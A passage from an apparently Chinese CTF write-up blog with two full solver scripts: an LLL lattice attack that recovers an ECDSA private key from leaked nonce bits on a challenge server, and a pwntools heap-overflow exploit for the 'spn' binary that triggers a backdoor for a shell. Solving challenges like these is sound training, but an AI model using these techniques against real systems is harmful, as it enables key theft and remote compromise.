class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> gmpy2 <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> hashlib <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">pow_of_work</span>(<span class="params">end,sha</span>):</span><br><span class="line">    s=string.ascii_letters+string.digits</span><br><span class="line">    <span class="keyword">for</span> a <span class="keyword">in</span> s:</span><br><span class="line">        <span class="keyword">for</span> b <span class="keyword">in</span> s:</span><br><span class="line">            <span class="keyword">for</span> c <span class="keyword">in</span> s:</span><br><span class="line">                <span class="keyword">for</span> d <span class="keyword">in</span> s:</span><br><span class="line">                    ss=a+b+c+d+end</span><br><span class="line">                    <span class="keyword">if</span> sha256(ss.encode()).hexdigest()==sha:</span><br><span class="line">                        <span class="keyword">return</span> a+b+c+d</span><br><span class="line">    </span><br><span class="line">q=<span class="number">0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141</span>   </span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">f=<span class="literal">False</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    p=remote(<span class="string">&#x27;121.36.197.254&#x27;</span>,<span class="number">9999</span>)</span><br><span class="line">    context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">    p.recvuntil(<span class="string">&#x27;XXXX+&#x27;</span>)</span><br><span class="line">    end=p.recv(<span class="number">16</span>).decode()</span><br><span class="line">    p.recvuntil(<span class="string">&#x27; == &#x27;</span>)</span><br><span class="line">    sha=p.recvuntil(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>].decode()</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Give me XXXX:&#x27;</span>)</span><br><span class="line">    xxxx=pow_of_work(end,sha)</span><br><span class="line">    p.sendline(xxxx)</span><br><span class="line">    public=<span class="built_in">eval</span>(p.recvuntil(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>])</span><br><span class="line"></span><br><span class="line">    R,S,K,H=[[] <span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>)]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">100</span>):</span><br><span class="line">        p.recvuntil(<span class="string">&#x27;Give me your message:\n&#x27;</span>)</span><br><span class="line">        p.sendline(<span class="built_in">str</span>(i))</span><br><span class="line">        </span><br><span class="line">        p.recvuntil(<span class="string">&#x27;r = &#x27;</span>)</span><br><span class="line">        rr=<span class="built_in">int</span>(p.recvuntil(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>])</span><br><span class="line">        R.append(rr)</span><br><span class="line">        </span><br><span class="line">        p.recvuntil(<span class="string">&#x27;s = &#x27;</span>)</span><br><span class="line">        ss=<span class="built_in">int</span>(p.recvuntil(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>])</span><br><span class="line">        S.append(ss)</span><br><span class="line">        </span><br><span class="line">        p.recvuntil(<span class="string">&#x27;kp = &#x27;</span>)</span><br><span class="line">        kk=<span class="built_in">int</span>(p.recvuntil(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>])</span><br><span class="line">        K.append(kk)</span><br><span class="line">        </span><br><span class="line">        p.recvuntil(<span class="string">&#x27;hash = &#x27;</span>)</span><br><span class="line">        hh=<span class="built_in">int</span>(p.recvuntil(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>])</span><br><span class="line">        H.append(hh)</span><br><span class="line"></span><br><span class="line">    H=[(H[i]-S[i]*K[i])%q <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(K))]</span><br><span class="line">    T=[<span class="built_in">int</span>(r*invert(<span class="built_in">pow</span>(<span class="number">2</span>,<span class="number">8</span>)*s,q)%q) <span class="keyword">for</span> (r,s) <span class="keyword">in</span> <span class="built_in">zip</span>(R,S)]</span><br><span class="line">    U=[<span class="built_in">int</span>(-h*invert(<span class="built_in">pow</span>(<span class="number">2</span>,<span class="number">8</span>)*s,q)%q) <span class="keyword">for</span> (h,s) <span class="keyword">in</span> <span class="built_in">zip</span>(H,S)]</span><br><span class="line">    t=<span class="number">100</span></span><br><span class="line">    M=[[<span class="number">0</span> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(t+<span class="number">2</span>)] <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(t)]</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(t):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(t):</span><br><span class="line">            <span class="keyword">if</span> i==j:</span><br><span class="line">                M[i][j]=<span class="built_in">int</span>(q)</span><br><span class="line">    k=<span class="number">2</span>^<span class="number">256</span></span><br><span class="line">    T+=[<span class="number">1</span>,<span class="number">0</span>]</span><br><span class="line">    U+=[<span class="number">0</span>,<span class="number">1</span>]</span><br><span class="line">    M.append(T)</span><br><span class="line">    M.append(U)</span><br><span class="line">    M=matrix(M)</span><br><span class="line">    L=M.LLL()</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> L:</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">abs</span>(i[-<span class="number">1</span>])==<span class="number">1</span>:</span><br><span class="line">            <span class="built_in">print</span>(i)</span><br><span class="line">            x=<span class="built_in">abs</span>(i[-<span class="number">2</span>])</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&#x27;*&#x27;</span>*<span class="number">100</span>)</span><br><span class="line">            f=<span class="literal">True</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">if</span> f:</span><br><span class="line">        p.recvuntil(<span class="string">&#x27;Give me dA\n&#x27;</span>)</span><br><span class="line">        p.sendline(<span class="built_in">str</span>(x))</span><br><span class="line">        <span class="built_in">print</span>(public)</span><br><span class="line">        p.recvall()</span><br><span class="line">        <span class="keyword">break</span></span><br></pre></td></tr></table></figure>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="spn"><a href="#spn" class="headerlink" title="spn"></a>spn</h3><p>非预期了，申请空间size没有限制，申请时size大于0x1000，两次拷贝的时候会超出  TEMPBUF2  0x1000的范围,而TEMPBUF2下面就是shell，backdoor只要满足shell不为0即可getshell，而拷贝时会对size大小的范围加密，甚至不需要发送数据，就能修改shell的值。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="comment"># coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># from z3 import *</span></span><br><span class="line">arch = <span class="string">&quot;amd64&quot;</span></span><br><span class="line">filename = <span class="string">&quot;SPN_ENC&quot;</span></span><br><span class="line"></span><br><span class="line">ip = <span class="string">&quot;124.71.194.126&quot;</span></span><br><span class="line">port =<span class="number">9999</span></span><br><span class="line"><span class="comment"># libc</span></span><br><span class="line"><span class="comment"># libc</span></span><br><span class="line">local_libc = ELF(<span class="string">&quot;/home/qingmu-z/Desktop/tools/pwn-change-libc/libs/2.27-3ubuntu1.4_amd64/libc-2.27.so&quot;</span>)</span><br><span class="line">remote_libc = ELF(<span class="string">&quot;/home/qingmu-z/Desktop/tools/pwn-change-libc/libs/2.27-3ubuntu1.4_amd64/libc-2.27.so&quot;</span>)</span><br><span class="line"><span class="comment"># ld</span></span><br><span class="line"><span class="comment"># local_ld=ELF(&quot;/lib64/ld-linux-x86-64.so.2&quot;)</span></span><br><span class="line"><span class="comment"># remote_ld=ELF(&quot;/lib64/ld-linux-x86-64.so.2&quot;)</span></span><br><span class="line"></span><br><span class="line">context(os=<span class="string">&quot;linux&quot;</span>, arch=arch, log_level=<span class="string">&quot;debug&quot;</span>)</span><br><span class="line"><span class="comment"># context.terminal = [&#x27;tmux&#x27;, &#x27;split&#x27;,&#x27;-h&#x27;]</span></span><br><span class="line">content = <span class="number">1</span></span><br><span class="line"></span><br><span class="line">offset = <span class="number">0</span></span><br><span class="line"><span class="comment"># elf</span></span><br><span class="line">elf = ELF(filename)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">b</span>(<span class="params">addr</span>):</span><br><span class="line">    bk = <span class="string">&quot;b *$rebase&quot;</span> + <span class="built_in">str</span>(addr)</span><br><span class="line">    gdb.attach(io, bk)</span><br><span class="line">    success(<span class="string">&quot;attach&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">idx,size</span>):</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;0.exit&quot;</span>)</span><br><span class="line">    io.sendline(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;Size:&quot;</span>)</span><br><span class="line">    io.sendline(<span class="built_in">str</span>(size).encode())</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;Index:&quot;</span>)</span><br><span class="line">    io.sendline(<span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">idx,size,payload</span>):</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;0.exit&quot;</span>)</span><br><span class="line">    io.sendline(<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;Index:&quot;</span>)</span><br><span class="line">    io.sendline(<span class="built_in">str</span>(idx).encode())</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;Size&quot;</span>)</span><br><span class="line">    io.sendline(<span class="built_in">str</span>(size).encode())</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;Content&quot;</span>)</span><br><span class="line">    sleep(<span class="number">0.1</span>)</span><br><span class="line">    io.send(payload)</span><br><span class="line">    sleep(<span class="number">0.1</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">free</span>(<span class="params">idx</span>):</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;0.exit&quot;</span>)</span><br><span class="line">    io.sendline(<span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;Index:&quot;</span>)</span><br><span class="line">    io.sendline(<span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">idx</span>):</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;0.exit&quot;</span>)</span><br><span class="line">    io.sendline(<span class="string">b&#x27;4&#x27;</span>)</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;Index:&quot;</span>)</span><br><span class="line">    io.sendline(<span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">backdoor</span>():</span><br><span class="line">    io.recvuntil(<span class="string">b&quot;0.exit&quot;</span>)</span><br><span class="line">    io.sendline(<span class="string">b&#x27;5&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">pwn</span>():</span><br><span class="line">    <span class="comment">### ptr_addr=0x204100 shell_addr=0x2040E0</span></span><br><span class="line">    io.recvuntil(<span class="string">b&quot;gift:&quot;</span>)</span><br><span class="line">    shell_addr=<span class="built_in">int</span>(io.recv(<span class="number">14</span>),<span class="number">16</span>)</span><br><span class="line">    success(<span class="string">&quot;shell_addr:&quot;</span>+<span class="built_in">hex</span>(shell_addr))</span><br><span class="line">    add(<span class="number">0</span>,<span class="number">0x1010</span>)</span><br><span class="line">    add(<span class="number">1</span>,<span class="number">0x80</span>)</span><br><span class="line">    sleep(<span class="number">1</span>)</span><br><span class="line">    edit(<span class="number">0</span>,<span class="number">0x1010</span>,<span class="string">b&#x27;a&#x27;</span>*(<span class="number">1</span>))</span><br><span class="line">    sleep(<span class="number">1</span>)</span><br><span class="line">    backdoor()</span><br><span class="line">    <span class="comment"># b(0x000000AD7)</span></span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    <span class="keyword">global</span> io</span><br><span class="line">    flag = <span class="number">1</span></span><br><span class="line">    <span class="keyword">while</span> flag &gt;= <span class="number">1</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            <span class="keyword">if</span> content == <span class="number">0</span>:</span><br><span class="line">                io = process(<span class="string">&quot;./&quot;</span> + filename)</span><br><span class="line">                libc = local_libc</span><br><span class="line">                <span class="comment"># ld = local_ld</span></span><br><span class="line">                <span class="comment"># onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3</span></span><br><span class="line">                onegadget = [<span class="number">0xe6c7e</span>, <span class="number">0xe6c81</span>, <span class="number">0xe6c84</span>]  <span class="comment"># 2.31 9.2</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                io = remote(ip, port)</span><br><span class="line">                libc = remote_libc</span><br><span class="line">                <span class="comment"># ld = remote_ld</span></span><br><span class="line">                <span class="comment"># onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3</span></span><br><span class="line">                onegadget = [<span class="number">0xe6c7e</span>, <span class="number">0xe6c81</span>, <span class="number">0xe6c84</span>]  <span class="comment"># 2.31 9.2</span></span><br><span class="line">            <span class="keyword">if</span> (pwn() == <span class="number">0</span>):</span><br><span class="line">                flag -= <span class="number">1</span></span><br><span class="line">                <span class="keyword">continue</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                io.interactive()</span><br><span class="line">                flag = <span class="number">0</span></span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">            <span class="built_in">print</span>(e)</span><br><span class="line">            io.close()</span><br><span class="line">            flag -= <span class="number">1</span></span><br><span class="line">            <span class="keyword">continue</span></span><br></pre></td></tr></table></figure>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="true">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                </ul>
            
        </div>
        
        
    <div id="gitalk-container" class="comment link"
		data-enable="true"
        data-ae="true"
        data-ci="5cd24ed310c0cbc2a2ed"
        data-cs="51aa998e509794b7b061784f1f3d41018af118f6"
        data-r="xikong-mubai.github.io"
        data-o="xikong-mubai"
        data-a="xikong-mubai"
        data-d="false"
    >查看评论</div>


    </div>
    
        <div class="side">
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Misc"><span class="toc-number">1.</span> <span class="toc-text">Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#BootFlag"><span class="toc-number">1.1.</span> <span class="toc-text">BootFlag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#a-sol"><span class="toc-number">1.2.</span> <span class="toc-text">a-sol</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web"><span class="toc-number">2.</span> <span class="toc-text">web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#cover"><span class="toc-number">2.1.</span> <span class="toc-text">cover</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#image-server1"><span class="toc-number">2.2.</span> <span class="toc-text">image server1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Easy-php"><span class="toc-number">2.3.</span> <span class="toc-text">Easy php</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Crypto"><span class="toc-number">3.</span> <span class="toc-text">Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#EZecdsa"><span class="toc-number">3.1.</span> <span class="toc-text">EZecdsa</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PWN"><span class="toc-number">4.</span> <span class="toc-text">PWN</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#spn"><span class="toc-number">4.1.</span> <span class="toc-text">spn</span></a></li></ol></li></ol>
        </div>
    
</div>


    </div>
</div>
</body>

<!--血小板代码-->
<link rel="stylesheet" href="/live2d/css/live2d.css" />
<div id="landlord">
    <div class="message" style="opacity:0"></div>
    <canvas id="live2d" width="280" height="250" class="live2d"></canvas>
    <div class="hide-button">隐藏</div>
</div>
<script type="text/javascript" src="https://cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
    var message_Path = '/live2d/'
    var home_Path = 'https://calmcenter.club/'
</script>
<script type="text/javascript" src="/live2d/js/live2d.js"></script>
<script type="text/javascript" src="/live2d/js/message.js"></script>
<script type="text/javascript">
    loadlive2d("live2d", "/live2d/model/kesshouban_v2/model.json");
</script>
<!--血小板代码-->


<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>



<script type="text/x-mathjax-config">
    MathJax.Hub.Config({"HTML-CSS": { preferredFont: "TeX", availableFonts: ["STIX","TeX"], linebreaks: { automatic:true }, EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50) },
        tex2jax: { inlineMath: [ ["$", "$"], ["\\(","\\)"] ], processEscapes: true, ignoreClass: "tex2jax_ignore|dno",skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']},
        TeX: {  noUndefined: { attributes: { mathcolor: "red", mathbackground: "#FFEEEE", mathsize: "90%" } }, Macros: { href: "{}" } },
        messageStyle: "none"
    });
</script>
<script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for(i=0; i < all.length; i += 1) {
            all[i].SourceElement().parentNode.className += ' has-jax';
        }
    });
</script>

<script async type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.7/MathJax.js?config=TeX-MML-AM_CHTML">
</script>




</html>
